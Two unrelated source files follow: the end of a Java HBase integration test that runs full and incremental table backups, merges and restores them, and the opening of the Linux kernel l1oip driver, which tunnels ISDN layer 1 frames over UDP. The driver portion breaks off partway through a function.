BackupAdmin client) throws IOException { String backupId = client.backupTables(request); return backupId; } private void restore(RestoreRequest request, BackupAdmin client) throws IOException { client.restore(request); } private void merge(String[] backupIds, BackupAdmin client) throws IOException { client.mergeBackups(backupIds); } private void runTestSingle(TableName table) throws IOException { List<String> backupIds = new ArrayList<String>(); List<Integer> tableSizes = new ArrayList<Integer>(); try (Connection conn = util.getConnection(); Admin admin = conn.getAdmin(); BackupAdmin client = new BackupAdminImpl(conn);) { // #0- insert some data to table 'table' loadData(table, rowsInIteration); tableSizes.add(rowsInIteration); // #1 - create full backup for table first LOG.info("create full backup image for {}", table); List<TableName> tables = Lists.newArrayList(table); BackupRequest.Builder builder = new BackupRequest.Builder(); BackupRequest request = builder.withBackupType(BackupType.FULL).withTableList(tables) .withTargetRootDir(BACKUP_ROOT_DIR).build(); String backupIdFull = backup(request, client); assertTrue(checkSucceeded(backupIdFull)); backupIds.add(backupIdFull); // Now continue with incremental backups int count = 1; while (count++ < numIterations) { // Load data loadData(table, rowsInIteration); tableSizes.add(rowsInIteration * count); // Do incremental backup builder = new BackupRequest.Builder(); request = builder.withBackupType(BackupType.INCREMENTAL).withTableList(tables) .withTargetRootDir(BACKUP_ROOT_DIR).build(); String backupId = backup(request, client); assertTrue(checkSucceeded(backupId)); backupIds.add(backupId); // Restore incremental backup for table, with overwrite for previous backup String previousBackupId = backupIds.get(backupIds.size() - 2); restoreVerifyTable(conn, client, table, previousBackupId, rowsInIteration * (count - 1)); // Restore incremental backup for table, with overwrite for last backup restoreVerifyTable(conn, client, table, backupId, rowsInIteration * count); } // Now merge all incremental and restore String[] incBackupIds = allIncremental(backupIds); merge(incBackupIds, client); // Restore last one String backupId = incBackupIds[incBackupIds.length - 1]; // restore incremental backup for table, with overwrite TableName[] tablesRestoreIncMultiple = new TableName[] { table }; restore(createRestoreRequest(BACKUP_ROOT_DIR, backupId, false, tablesRestoreIncMultiple, null, true), client); Table hTable = conn.getTable(table); Assert.assertEquals(util.countRows(hTable), rowsInIteration * numIterations); hTable.close(); LOG.info("{} loop {} finished.", Thread.currentThread().getName(), (count-1)); } } private void restoreVerifyTable(Connection conn, BackupAdmin client, TableName table, String backupId, long expectedRows) throws IOException { TableName[] tablesRestoreIncMultiple = new TableName[] { table }; restore(createRestoreRequest(BACKUP_ROOT_DIR, backupId, false, tablesRestoreIncMultiple, null, true), client); Table hTable = conn.getTable(table); Assert.assertEquals(expectedRows, util.countRows(hTable)); hTable.close(); } private String[] allIncremental(List<String> backupIds) { int size = backupIds.size(); backupIds = backupIds.subList(1, size); String[] arr = new String[size - 1]; backupIds.toArray(arr); return arr; } /** * * @param backupId pass backup ID to check status of * @return status of backup */ protected boolean checkSucceeded(String backupId) throws IOException { BackupInfo status = getBackupInfo(backupId); if (status == null) { return false; } return status.getState() == BackupState.COMPLETE; } private BackupInfo getBackupInfo(String backupId) throws IOException { try (BackupSystemTable table = new BackupSystemTable(util.getConnection())) { return table.readBackupInfo(backupId); } } /** * Get restore request. * * @param backupRootDir directory where backup is located * @param backupId backup ID * @param check check the backup * @param fromTables table names to restore from * @param toTables new table names to restore to * @param isOverwrite overwrite the table(s) * @return an instance of RestoreRequest */ public RestoreRequest createRestoreRequest(String backupRootDir, String backupId, boolean check, TableName[] fromTables, TableName[] toTables, boolean isOverwrite) { RestoreRequest.Builder builder = new RestoreRequest.Builder(); return builder.withBackupRootDir(backupRootDir) .withBackupId(backupId) .withCheck(check) .withFromTables(fromTables) .withToTables(toTables) .withOvewrite(isOverwrite).build(); } @Override public void setUpCluster() throws Exception { util = getTestingUtil(getConf()); enableBackup(getConf()); LOG.debug("Initializing/checking cluster has {} servers",regionServerCount); util.initializeCluster(regionServerCount); LOG.debug("Done initializing/checking cluster"); } /** * * @return status of CLI execution */ @Override public int runTestFromCommandLine() throws Exception { // Check if backup is enabled if (!BackupManager.isBackupEnabled(getConf())) { System.err.println(BackupRestoreConstants.ENABLE_BACKUP); return -1; } System.out.println(BackupRestoreConstants.VERIFY_BACKUP); testBackupRestore(); return 0; } @Override public TableName getTablename() { // That is only valid when Monkey is CALM (no monkey) return null; } @Override protected Set<String> getColumnFamilies() { // That is only valid when Monkey is CALM (no monkey) return null; } @Override protected void addOptions() { addOptWithArg(REGIONSERVER_COUNT_KEY, "Total number of region servers. Default: '" + DEFAULT_REGIONSERVER_COUNT + "'"); addOptWithArg(REGION_COUNT_KEY, "Total number of regions. Default: " + DEFAULT_REGION_COUNT); addOptWithArg(ROWS_PER_ITERATION_KEY, "Total number of data rows to be loaded during one iteration." + " Default: " + DEFAULT_ROWS_IN_ITERATION); addOptWithArg(NUM_ITERATIONS_KEY, "Total number iterations." + " Default: " + DEFAULT_NUM_ITERATIONS); addOptWithArg(NUMBER_OF_TABLES_KEY, "Total number of tables in the test." + " Default: " + DEFAULT_NUMBER_OF_TABLES); addOptWithArg(SLEEP_TIME_KEY, "Sleep time of chaos monkey in ms " + "to restart random region server. Default: " + SLEEP_TIME_DEFAULT); } @Override protected void processOptions(CommandLine cmd) { super.processOptions(cmd); regionsCountPerServer = Integer.parseInt(cmd.getOptionValue(REGION_COUNT_KEY, Integer.toString(DEFAULT_REGION_COUNT))); regionServerCount = Integer.parseInt(cmd.getOptionValue(REGIONSERVER_COUNT_KEY, Integer.toString(DEFAULT_REGIONSERVER_COUNT))); rowsInIteration = Integer.parseInt(cmd.getOptionValue(ROWS_PER_ITERATION_KEY, Integer.toString(DEFAULT_ROWS_IN_ITERATION))); numIterations = Integer.parseInt(cmd.getOptionValue(NUM_ITERATIONS_KEY, Integer.toString(DEFAULT_NUM_ITERATIONS))); numTables = Integer.parseInt(cmd.getOptionValue(NUMBER_OF_TABLES_KEY, Integer.toString(DEFAULT_NUMBER_OF_TABLES))); sleepTime = Long.parseLong(cmd.getOptionValue(SLEEP_TIME_KEY, Long.toString(SLEEP_TIME_DEFAULT))); LOG.info(MoreObjects.toStringHelper("Parsed Options") .add(REGION_COUNT_KEY, regionsCountPerServer) .add(REGIONSERVER_COUNT_KEY, regionServerCount) .add(ROWS_PER_ITERATION_KEY, rowsInIteration) .add(NUM_ITERATIONS_KEY, numIterations) .add(NUMBER_OF_TABLES_KEY, numTables) .add(SLEEP_TIME_KEY, sleepTime) .toString()); } /** * * @param args argument list */ public static void main(String[] args) throws Exception { Configuration conf = HBaseConfiguration.create(); IntegrationTestingUtility.setUseDistributedCluster(conf); int status = ToolRunner.run(conf, new IntegrationTestBackupRestore(), args); System.exit(status); } }
{ "pile_set_name": "Github" }
/* * l1oip.c low level driver for tunneling layer 1 over IP * * NOTE: It is not compatible with TDMoIP nor "ISDN over IP". * * Author Andreas Eversberg ([email protected]) * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2, or (at your option) * any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. * */ /* module parameters: * type: Value 1 = BRI Value 2 = PRI Value 3 = BRI (multi channel frame, not supported yet) Value 4 = PRI (multi channel frame, not supported yet) A multi channel frame reduces overhead to a single frame for all b-channels, but increases delay. (NOTE: Multi channel frames are not implemented yet.) * codec: Value 0 = transparent (default) Value 1 = transfer ALAW Value 2 = transfer ULAW Value 3 = transfer generic 4 bit compression. * ulaw: 0 = we use a-Law (default) 1 = we use u-Law * limit: limitation of B-channels to control bandwidth (1...126) BRI: 1 or 2 PRI: 1-30, 31-126 (126, because dchannel ist not counted here) Also limited ressources are used for stack, resulting in less channels. It is possible to have more channels than 30 in PRI mode, this must be supported by the application. * ip: byte representation of remote ip address (127.0.0.1 -> 127,0,0,1) If not given or four 0, no remote address is set. For multiple interfaces, concat ip addresses. (127,0,0,1,127,0,0,1) * port: port number (local interface) If not given or 0, port 931 is used for fist instance, 932 for next... For multiple interfaces, different ports must be given. * remoteport: port number (remote interface) If not given or 0, remote port equals local port For multiple interfaces on equal sites, different ports must be given. * ondemand: 0 = fixed (always transmit packets, even when remote side timed out) 1 = on demand (only transmit packets, when remote side is detected) the default is 0 NOTE: ID must also be set for on demand. * id: optional value to identify frames. This value must be equal on both peers and should be random. If omitted or 0, no ID is transmitted. * debug: NOTE: only one debug value must be given for all cards enable debugging (see l1oip.h for debug options) Special mISDN controls: op = MISDN_CTRL_SETPEER* p1 = bytes 0-3 : remote IP address in network order (left element first) p2 = bytes 1-2 : remote port in network order (high byte first) optional: p2 = bytes 3-4 : local port in network order (high byte first) op = MISDN_CTRL_UNSETPEER* * Use l1oipctrl for comfortable setting or removing ip address. (Layer 1 Over IP CTRL) L1oIP-Protocol -------------- Frame Header: 7 6 5 4 3 2 1 0 +---------------+ |Ver|T|I|Coding | +---------------+ | ID byte 3 * | +---------------+ | ID byte 2 * | +---------------+ | ID byte 1 * | +---------------+ | ID byte 0 * | +---------------+ |M| Channel | +---------------+ | Length * | +---------------+ | Time Base MSB | +---------------+ | Time Base LSB | +---------------+ | Data.... | ... | | +---------------+ |M| Channel | +---------------+ | Length * | +---------------+ | Time Base MSB | +---------------+ | Time Base LSB | +---------------+ | Data.... | ... * Only included in some cases. - Ver = Version If version is missmatch, the frame must be ignored. - T = Type of interface Must be 0 for S0 or 1 for E1. - I = Id present If bit is set, four ID bytes are included in frame. - ID = Connection ID Additional ID to prevent Denial of Service attacs. Also it prevents hijacking connections with dynamic IP. The ID should be random and must not be 0. - Coding = Type of codec Must be 0 for no transcoding. Also for D-channel and other HDLC frames. 1 and 2 are reserved for explicitly use of a-LAW or u-LAW codec. 3 is used for generic table compressor. - M = More channels to come. If this flag is 1, the following byte contains the length of the channel data. After the data block, the next channel will be defined. The flag for the last channel block (or if only one channel is transmitted), must be 0 and no length is given. - Channel = Channel number 0 reserved 1-3 channel data for S0 (3 is D-channel) 1-31 channel data for E1 (16 is D-channel) 32-127 channel data for extended E1 (16 is D-channel) - The length is used if the M-flag is 1. It is used to find the next channel inside frame. NOTE: A value of 0 equals 256 bytes of data. -> For larger data blocks, a single frame must be used. -> For larger streams, a single frame or multiple blocks with same channel ID must be used. - Time Base = Timestamp of first sample in frame The "Time Base" is used to rearange packets and to detect packet loss. The 16 bits are sent in network order (MSB first) and count 1/8000 th of a second. This causes a wrap around each 8,192 seconds. There is no requirement for the initial "Time Base", but 0 should be used for the first packet. In case of HDLC data, this timestamp counts the packet or byte number. Two Timers: After initialisation, a timer of 15 seconds is started. Whenever a packet is transmitted, the timer is reset to 15 seconds again. If the timer expires, an empty packet is transmitted. This keep the connection alive. When a valid packet is received, a timer 65 seconds is started. The interface become ACTIVE. If the timer expires, the interface becomes INACTIVE. Dynamic IP handling: To allow dynamic IP, the ID must be non 0. In this case, any packet with the correct port number and ID will be accepted. If the remote side changes its IP the new IP is used for all transmitted packets until it changes again. On Demand: If the ondemand parameter is given, the remote IP is set to 0 on timeout. This will stop keepalive traffic to remote. If the remote is online again, traffic will continue to the remote address. This is useful for road warriors. This feature only works with ID set, otherwhise it is highly unsecure. Socket and Thread ----------------- The complete socket opening and closing is done by a thread. When the thread opened a socket, the hc->socket descriptor is set. Whenever a packet shall be sent to the socket, the hc->socket must be checked wheter not NULL. To prevent change in socket descriptor, the hc->socket_lock must be used. To change the socket, a recall of l1oip_socket_open() will safely kill the socket process and create a new one. */ #define L1OIP_VERSION 0 /* 0...3 */ #include <linux/module.h> #include <linux/delay.h> #include <linux/mISDNif.h> #include <linux/mISDNhw.h> #include <linux/mISDNdsp.h> #include <linux/init.h> #include <linux/in.h> #include <linux/inet.h> #include <linux/workqueue.h> #include <linux/kthread.h> #include <linux/slab.h> #include <linux/sched/signal.h> #include <net/sock.h> #include "core.h" #include "l1oip.h" static const char *l1oip_revision = "2.00"; static int l1oip_cnt; static spinlock_t l1oip_lock; static struct list_head l1oip_ilist; #define MAX_CARDS 16 static u_int type[MAX_CARDS]; static u_int codec[MAX_CARDS]; static u_int ip[MAX_CARDS * 4]; static u_int port[MAX_CARDS]; static u_int remoteport[MAX_CARDS]; static u_int ondemand[MAX_CARDS]; static u_int limit[MAX_CARDS]; static u_int id[MAX_CARDS]; static int debug; static int ulaw; MODULE_AUTHOR("Andreas Eversberg"); MODULE_LICENSE("GPL"); module_param_array(type, uint, NULL, S_IRUGO | S_IWUSR); module_param_array(codec, uint, NULL, S_IRUGO | S_IWUSR); module_param_array(ip, uint, NULL, S_IRUGO | S_IWUSR); module_param_array(port, uint, NULL, S_IRUGO | S_IWUSR); module_param_array(remoteport, uint, NULL, S_IRUGO | S_IWUSR); module_param_array(ondemand, uint, NULL, S_IRUGO | S_IWUSR); module_param_array(limit, uint, NULL, S_IRUGO | S_IWUSR); module_param_array(id, uint, NULL, S_IRUGO | S_IWUSR); module_param(ulaw, uint, S_IRUGO | S_IWUSR); module_param(debug, uint, S_IRUGO | S_IWUSR); /* * send a frame via socket, if open and restart timer */ static int l1oip_socket_send(struct l1oip *hc, u8 localcodec, u8 channel, u32 chanmask, u16 timebase, u8 *buf, int len) { u8 *p; u8 frame[MAX_DFRAME_LEN_L1 + 32]; struct socket *socket = NULL; if (debug & DEBUG_L1OIP_MSG) printk(KERN_DEBUG "%s: sending data to socket (len = %d)\n", __func__, len); p = frame; /* restart timer */ if (time_before(hc->keep_tl.expires, jiffies + 5 * HZ)) mod_timer(&hc->keep_tl, jiffies + L1OIP_KEEPALIVE * HZ); else hc->keep_tl.expires = jiffies + L1OIP_KEEPALIVE * HZ; if (debug & DEBUG_L1OIP_MSG) printk(KERN_DEBUG "%s: resetting timer\n", __func__); /* drop if we have no remote ip or port */ if (!hc->sin_remote.sin_addr.s_addr || !hc->sin_remote.sin_port) { if (debug & DEBUG_L1OIP_MSG) printk(KERN_DEBUG "%s: dropping frame, because remote " "IP is not set.\n", __func__); return len; } /* assemble frame */ *p++ = (L1OIP_VERSION << 6) /* version and coding */ | (hc->pri ? 0x20 : 0x00) /* type */ | (hc->id ? 0x10 : 0x00) /* id */ | localcodec; if (hc->id) { *p++ = hc->id >> 24; /* id */ *p++ = hc->id >> 16; *p++ = hc->id >> 8; *p++ = hc->id; } *p++ = 0x00 + channel; /* m-flag, channel */ *p++ = timebase >> 8; /* time base */ *p++ = timebase; if (buf && len) { /* add data to frame */ if (localcodec == 1 && ulaw) l1oip_ulaw_to_alaw(buf, len, p); else if (localcodec == 2 && !ulaw) l1oip_alaw_to_ulaw(buf, len, p); else if (localcodec == 3) len = l1oip_law_to_4bit(buf, len, p, &hc->chan[channel].codecstate); else memcpy(p, buf, len); } len += p - frame; /* check for socket in safe condition */ spin_lock(&hc->socket_lock); if (!hc->socket) { spin_unlock(&hc->socket_lock); return 0; } /* seize socket */ socket = hc->socket; hc->socket = NULL; spin_unlock(&hc->socket_lock); /* send packet */ if (debug & DEBUG_L1OIP_MSG) printk(KERN_DEBUG "%s: sending packet to socket (len " "= %d)\n", __func__, len); hc->sendiov.iov_base = frame; hc->sendiov.iov_len = len; len = kernel_sendmsg(socket, &hc->sendmsg, &hc->sendiov, 1, len); /* give socket back */ hc->socket = socket; /* no locking required */ return len; } /* * receive channel data from socket */ static void l1oip_socket_recv(struct l1oip *hc, u8 remotecodec, u8 channel, u16 timebase, u8 *buf, int len) { struct sk_buff *nskb; struct bchannel *bch; struct dchannel *dch; u8 *p; u32 rx_counter; if (len == 0) { if (debug & DEBUG_L1OIP_MSG) printk(KERN_DEBUG "%s: received empty keepalive data, " "ignoring\n", __func__); return; } if (debug & DEBUG_L1OIP_MSG) printk(KERN_DEBUG "%s: received data, sending to mISDN (%d)\n", __func__, len); if (channel < 1 || channel > 127) { printk(KERN_WARNING "%s: packet error - channel %d out of " "range\n", __func__, channel); return; } dch = hc->chan[channel].dch; bch = hc->chan[channel].bch; if (!dch && !bch) { printk(KERN_WARNING "%s: packet error - channel %d not in " "stack\n", __func__, channel); return; } /* prepare message */ nskb = mI_alloc_skb((remotecodec == 3) ? (len << 1) : len, GFP_ATOMIC); if (!nskb) { printk(KERN_ERR "%s: No mem for skb.\n", __func__); return; } p = skb_put(nskb, (remotecodec == 3) ? (len << 1) : len); if (remotecodec == 1 && ulaw) l1oip_alaw_to_ulaw(buf, len, p); else if (remotecodec == 2 && !ulaw) l1oip_ulaw_to_alaw(buf, len, p); else if (remotecodec == 3) len = l1oip_4bit_to_law(buf, len, p); else memcpy(p, buf, len); /* send message up */ if (dch && len >= 2) { dch->rx_skb = nskb; recv_Dchannel(dch); } if (bch) { /* expand 16 bit sequence number to 32 bit sequence number */ rx_counter = hc->chan[channel].rx_counter; if (((s16)(timebase - rx_counter)) >= 0) { /* time has changed forward */ if (timebase >= (rx_counter & 0xffff)) rx_counter = (rx_counter & 0xffff0000) | timebase; else rx_counter = ((rx_counter & 0xffff0000) + 0x10000) | timebase; } else { /* time has changed backwards */ if (timebase < (rx_counter & 0xffff)) rx_counter = (rx_counter & 0xffff0000) | timebase; else rx_counter = ((rx_counter & 0xffff0000) - 0x10000) | timebase; } hc->chan[channel].rx_counter = rx_counter; #ifdef REORDER_DEBUG if (hc->chan[channel].disorder_flag) { swap(hc->chan[channel].disorder_skb, nskb); swap(hc->chan[channel].disorder_cnt, rx_counter); } hc->chan[channel].disorder_flag ^= 1; if (nskb) #endif queue_ch_frame(&bch->ch, PH_DATA_IND, rx_counter, nskb); } } /* * parse frame and extract channel data */ static void l1oip_socket_parse(struct l1oip *hc, struct sockaddr_in *sin, u8 *buf, int len) { u32 packet_id; u8 channel; u8 remotecodec; u16 timebase; int m, mlen; int len_start = len; /* initial frame length */ struct dchannel *dch = hc->chan[hc->d_idx].dch; if (debug & DEBUG_L1OIP_MSG) printk(KERN_DEBUG "%s: received frame, parsing... (%d)\n", __func__, len); /* check length */ if (len < 1 + 1 + 2) { printk(KERN_WARNING "%s: packet error - length %d below " "4 bytes\n", __func__, len); return; } /* check version */ if (((*buf) >> 6) != L1OIP_VERSION) { printk(KERN_WARNING "%s: packet error - unknown version %d\n", __func__, buf[0]>>6); return; } /* check type */ if (((*buf) & 0x20) && !hc->pri) { printk(KERN_WARNING "%s: packet error - received E1 packet " "on S0 interface\n", __func__); return; } if (!((*buf) & 0x20) && hc->pri) { printk(KERN_WARNING "%s: packet error - received S0 packet " "on E1 interface\n", __func__); return; } /* get id flag */ packet_id = (*buf >> 4) & 1; /* check coding */ remotecodec = (*buf) & 0x0f; if (remotecodec > 3) { printk(KERN_WARNING "%s: packet error - remotecodec %d " "unsupported\n", __func__, remotecodec); return; } buf++; len--; /* check packet_id */ if (packet_id) { if (!hc->id) { printk(KERN_WARNING "%s: packet error - packet has id " "0x%x, but we have not\n", __func__, packet_id); return; } if (len < 4) { printk(KERN_WARNING "%s: packet error - packet too " "short for ID value\n", __func__); return; } packet_id = (*buf++) << 24; packet_id += (*buf++) << 16; packet_id += (*buf++) << 8; packet_id += (*buf++); len -= 4; if (packet_id != hc->id) { printk(KERN_WARNING "%s: packet error - ID mismatch, " "got 0x%x, we 0x%x\n", __func__, packet_id, hc->id); return; } } else { if (hc->id) { printk(KERN_WARNING "%s: packet error - packet has no " "ID, but we have\n", __func__); return; } } multiframe: if (len < 1) { printk(KERN_WARNING "%s: packet error - packet too short, " "channel expected at position %d.\n", __func__, len-len_start + 1); return; } /* get channel and multiframe flag */ channel = *buf & 0x7f; m = *buf >> 7; buf++; len--; /* check length on multiframe */ if (m) { if (len < 1) { printk(KERN_WARNING "%s: packet error - packet too " "short, length expected at position %d.\n", __func__, len_start - len - 1); return; } mlen = *buf++; len--; if (mlen == 0) mlen = 256; if (len < mlen + 3) { printk(KERN_WARNING "%s: packet error - length %d at " "position %d exceeds total length %d.\n", __func__, mlen, len_start-len - 1, len_start); return; } if (len == mlen + 3) { printk(KERN_WARNING "%s: packet error - length %d at " "position %d will not allow additional " "packet.\n", __func__, mlen, len_start-len + 1); return; } } else mlen = len - 2; /* single frame, subtract timebase */ if (len < 2) { printk(KERN_WARNING "%s: packet error - packet too short, time " "base expected at position %d.\n", __func__, len-len_start + 1); return; } /* get time base */ timebase = (*buf++) << 8; timebase |= (*buf++); len -= 2; /* if inactive, we send up a PH_ACTIVATE and activate */ if (!test_bit(FLG_ACTIVE, &dch->Flags)) { if (debug & (DEBUG_L1OIP_MSG | DEBUG_L1OIP_SOCKET)) printk(KERN_DEBUG "%s: interface become active due to " "received packet\n", __func__); test_and_set_bit(FLG_ACTIVE, &dch->Flags); _queue_data(&dch->dev.D, PH_ACTIVATE_IND, MISDN_ID_ANY, 0, NULL, GFP_ATOMIC); } /* distribute packet */ l1oip_socket_recv(hc, remotecodec, channel, timebase, buf, mlen); buf += mlen; len -= mlen; /* multiframe */ if (m) goto multiframe; /* restart timer */ if (time_before(hc->timeout_tl.expires, jiffies + 5 * HZ) || !hc->timeout_on) { hc->timeout_on = 1; mod_timer(&hc->timeout_tl, jiffies + L1OIP_TIMEOUT * HZ); } else /* only adjust timer */ hc->timeout_tl.expires = jiffies + L1OIP_TIMEOUT * HZ; /* if ip or source port changes */ if ((hc->sin_remote.sin_addr.s_addr != sin->sin_addr.s_addr) || (hc->sin_remote.sin_port != sin->sin_port)) { if (debug & DEBUG_L1OIP_SOCKET) printk(KERN_DEBUG "%s: remote address changes from " "0x%08x to 0x%08x (port %d to %d)\n", __func__, ntohl(hc->sin_remote.sin_addr.s_addr), ntohl(sin->sin_addr.s_addr), ntohs(hc->sin_remote.sin_port), ntohs(sin->sin_port)); hc->sin_remote.sin_addr.s_addr = sin->sin_addr.s_addr; hc->sin_remote.sin_port = sin->sin_port; } } /* * socket stuff */ static int l1oip_socket_thread(void *data) { struct l1oip *hc = (struct l1oip *)data; int ret = 0; struct sockaddr_in sin_rx; struct kvec iov; struct msghdr msg = {.msg_name = &sin_rx, .msg_namelen = sizeof(sin_rx)}; unsigned char *recvbuf; size_t recvbuf_size = 1500; int recvlen; struct socket *socket = NULL; DECLARE_COMPLETION_ONSTACK(wait); /* allocate buffer memory */ recvbuf = kmalloc(recvbuf_size, GFP_KERNEL); if (!recvbuf) { printk(KERN_ERR "%s: Failed to alloc recvbuf.\n", __func__); ret = -ENOMEM; goto fail; } iov.iov_base = recvbuf; iov.iov_len = recvbuf_size; /* make daemon */ allow_signal(SIGTERM); /* create socket */ if (sock_create(PF_INET, SOCK_DGRAM, IPPROTO_UDP, &socket)) { printk(KERN_ERR "%s: Failed to create socket.\n", __func__); ret = -EIO; goto fail; } /* set incoming address */ hc->sin_local.sin_family = AF_INET; hc->sin_local.sin_addr.s_addr = INADDR_ANY; hc->sin_local.sin_port = htons((unsigned short)hc->localport); /* set outgoing address */ hc->sin_remote.sin_family = AF_INET; hc->sin_remote.sin_addr.s_addr = htonl(hc->remoteip); hc->sin_remote.sin_port = htons((unsigned short)hc->remoteport); /* bind to incoming port */ if (socket->ops->bind(socket, (struct sockaddr *)&hc->sin_local, sizeof(hc->sin_local))) { printk(KERN_ERR "%s: Failed to bind socket to port %d.\n", __func__, hc->localport); ret = -EINVAL; goto fail; } /* check sk */ if (socket->sk == NULL) { printk(KERN_ERR "%s: socket->sk == NULL\n", __func__); ret = -EIO; goto fail; } /* build send message */ hc->sendmsg.msg_name = &hc->sin_remote; hc->sendmsg.msg_namelen = sizeof(hc->sin_remote); hc->sendmsg.msg_control = NULL; hc->sendmsg.msg_controllen = 0; /* give away socket */ spin_lock(&hc->socket_lock); hc->socket = socket; spin_unlock(&hc->socket_lock); /* read loop */ if (debug & DEBUG_L1OIP_SOCKET) printk(KERN_DEBUG "%s: socket created and open\n", __func__); while (!signal_pending(current)) { iov_iter_kvec(&msg.msg_iter, READ | ITER_KVEC, &iov, 1, recvbuf_size); recvlen = sock_recvmsg(socket, &msg, 0); if (recvlen > 0) { l1oip_socket_parse(hc, &sin_rx, recvbuf, recvlen); } else { if (debug & DEBUG_L1OIP_SOCKET) printk(KERN_WARNING "%s: broken pipe on socket\n", __func__); } } /* get socket back, check first if in use, maybe by send function */ spin_lock(&hc->socket_lock); /* if hc->socket is NULL, it is in use until it is given back */ while (!hc->socket) { spin_unlock(&hc->socket_lock); schedule_timeout(HZ / 10); spin_lock(&hc->socket_lock); } hc->socket = NULL; spin_unlock(&hc->socket_lock); if (debug & DEBUG_L1OIP_SOCKET) printk(KERN_DEBUG "%s: socket thread terminating\n", __func__); fail: /* free recvbuf */ kfree(recvbuf); /* close socket */ if (socket) sock_release(socket); /* if we got killed, signal completion */ complete(&hc->socket_complete); hc->socket_thread = NULL; /* show termination of thread */ if (debug & DEBUG_L1OIP_SOCKET) printk(KERN_DEBUG "%s: socket thread terminated\n", __func__); return ret; } static void l1oip_socket_close(struct l1oip *hc) { struct dchannel *dch = hc->chan[hc->d_idx].dch; /* kill thread */ if (hc->socket_thread) { if (debug & DEBUG_L1OIP_SOCKET) printk(KERN_DEBUG "%s: socket thread exists, " "killing...\n", __func__); send_sig(SIGTERM, hc->socket_thread, 0); wait_for_completion(&hc->socket_complete); } /* if active, we send up a PH_DEACTIVATE and deactivate */ if (test_bit(FLG_ACTIVE, &dch->Flags)) { if (debug & (DEBUG_L1OIP_MSG | DEBUG_L1OIP_SOCKET)) printk(KERN_DEBUG "%s: interface become deactivated " "due to timeout\n", __func__); test_and_clear_bit(FLG_ACTIVE, &dch->Flags); _queue_data(&dch->dev.D, PH_DEACTIVATE_IND, MISDN_ID_ANY, 0, NULL, GFP_ATOMIC); } } static int l1oip_socket_open(struct l1oip *hc) { /* in case of reopen, we need to close first */ l1oip_socket_close(hc); init_completion(&hc->socket_complete); /* create receive process */ hc->socket_thread = kthread_run(l1oip_socket_thread, hc, "l1oip_%s", hc->name); if (IS_ERR(hc->socket_thread)) { int err = PTR_ERR(hc->socket_thread); printk(KERN_ERR "%s: Failed (%d) to create socket process.\n", __func__, err); hc->socket_thread = NULL; sock_release(hc->socket); return err; } if (debug & DEBUG_L1OIP_SOCKET) printk(KERN_DEBUG "%s: socket thread created\n", __func__); return 0; } static void l1oip_send_bh(struct work_struct *work) { struct l1oip *hc = container_of(work, struct l1oip, workq); if (debug & (DEBUG_L1OIP_MSG | DEBUG_L1OIP_SOCKET)) printk(KERN_DEBUG "%s: keepalive timer expired, sending empty " "frame on dchannel\n", __func__); /* send an empty l1oip frame at D-channel */ l1oip_socket_send(hc, 0, hc->d_idx, 0, 0, NULL, 0); } /* * timer stuff */ static void l1oip_keepalive(struct timer_list *t) { struct l1oip *hc = from_timer(hc, t, keep_tl); schedule_work(&hc->workq); } static void l1oip_timeout(struct timer_list *t) { struct l1oip *hc = from_timer(hc, t, timeout_tl); struct dchannel *dch = hc->chan[hc->d_idx].dch; if (debug & DEBUG_L1OIP_MSG) printk(KERN_DEBUG "%s: timeout timer expired, turn layer one " "down.\n", __func__); hc->timeout_on = 0; /* state that timer must be initialized next time */ /* if timeout, we send up a PH_DEACTIVATE and deactivate */ if (test_bit(FLG_ACTIVE, &dch->Flags)) { if (debug & (DEBUG_L1OIP_MSG | DEBUG_L1OIP_SOCKET)) printk(KERN_DEBUG "%s: interface become deactivated " "due to timeout\n", __func__); test_and_clear_bit(FLG_ACTIVE, &dch->Flags); _queue_data(&dch->dev.D, PH_DEACTIVATE_IND, MISDN_ID_ANY, 0, NULL, GFP_ATOMIC); } /* if we have ondemand set, we remove ip address */ if (hc->ondemand) { if (debug & DEBUG_L1OIP_MSG) printk(KERN_DEBUG "%s: on demand causes ip address to " "be removed\n", __func__); hc->sin_remote.sin_addr.s_addr = 0; } } /* * message handling */ static int handle_dmsg(struct mISDNchannel *ch, struct sk_buff *skb) { struct mISDNdevice *dev = container_of(ch, struct mISDNdevice, D); struct dchannel *dch = container_of(dev, struct dchannel, dev); struct l1oip *hc = dch->hw; struct mISDNhead *hh = mISDN_HEAD_P(skb); int ret = -EINVAL; int l, ll; unsigned char *p; switch (hh->prim) { case PH_DATA_REQ: if (skb->len < 1) { printk(KERN_WARNING "%s: skb too small\n", __func__); break; } if (skb->len > MAX_DFRAME_LEN_L1 || skb->len > L1OIP_MAX_LEN) { printk(KERN_WARNING "%s: skb too large\n", __func__); break; } /* send frame */ p = skb->data; l = skb->len; while (l) { /* * This is technically bounded by L1OIP_MAX_PERFRAME but * MAX_DFRAME_LEN_L1 < L1OIP_MAX_PERFRAME */ ll = (l < MAX_DFRAME_LEN_L1) ? l : MAX_DFRAME_LEN_L1; l1oip_socket_send(hc, 0, dch->slot, 0, hc->chan[dch->slot].tx_counter++, p, ll); p += ll; l -= ll; } skb_trim(skb, 0); queue_ch_frame(ch, PH_DATA_CNF, hh->id, skb); return 0; case PH_ACTIVATE_REQ: if (debug & (DEBUG_L1OIP_MSG | DEBUG_L1OIP_SOCKET)) printk(KERN_DEBUG "%s: PH_ACTIVATE channel %d (1..%d)\n" , __func__, dch->slot, hc->b_num + 1); skb_trim(skb, 0); if (test_bit(FLG_ACTIVE, &dch->Flags)) queue_ch_frame(ch, PH_ACTIVATE_IND, hh->id, skb); else queue_ch_frame(ch, PH_DEACTIVATE_IND, hh->id, skb); return 0; case PH_DEACTIVATE_REQ: if (debug & (DEBUG_L1OIP_MSG | DEBUG_L1OIP_SOCKET)) printk(KERN_DEBUG "%s: PH_DEACTIVATE channel %d " "(1..%d)\n", __func__, dch->slot, hc->b_num + 1); skb_trim(skb, 0); if (test_bit(FLG_ACTIVE, &dch->Flags)) queue_ch_frame(ch, PH_ACTIVATE_IND, hh->id, skb); else queue_ch_frame(ch, PH_DEACTIVATE_IND, hh->id, skb); return 0; } if (!ret) dev_kfree_skb(skb); return ret; } static int channel_dctrl(struct dchannel *dch, struct mISDN_ctrl_req *cq) { int ret = 0; struct l1oip *hc = 